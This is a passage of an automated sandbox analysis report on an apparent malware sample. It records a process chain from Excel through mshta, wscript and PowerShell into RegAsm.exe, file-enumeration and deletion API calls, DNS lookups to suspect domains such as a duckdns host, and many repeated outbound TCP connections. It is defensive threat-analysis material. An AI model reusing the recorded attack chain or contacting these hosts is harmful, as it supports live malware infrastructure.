                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,23_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_10006580 FindFirstFileExA,23_2_10006580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0040AE51 FindFirstFileW,FindNextFileW,26_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,28_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,29_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,31_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,31_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,31_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,31_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,31_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00407877 FindFirstFileW,FindNextFileW,31_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0044E8F9 FindFirstFileExA,31_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,31_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,31_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,31_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,31_2_00407CD2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                    Software Vulnerabilities

                    barindex
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
                    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: global trafficDNS query: name: wrath.me
                    Source: global trafficDNS query: name: wrath.me
                    Source: global trafficDNS query: name: ia600102.us.archive.org
                    Source: global trafficDNS query: name: wrath.me
                    Source: global trafficDNS query: name: ugnrv.duckdns.org
                    Source: global trafficDNS query: name: geoplugin.net
                    Source: global trafficDNS query: name: ia600102.us.archive.org
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 178.237.33.50:80
                    Source: global trafficTCP traffic: 192.168.2.22:49177 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
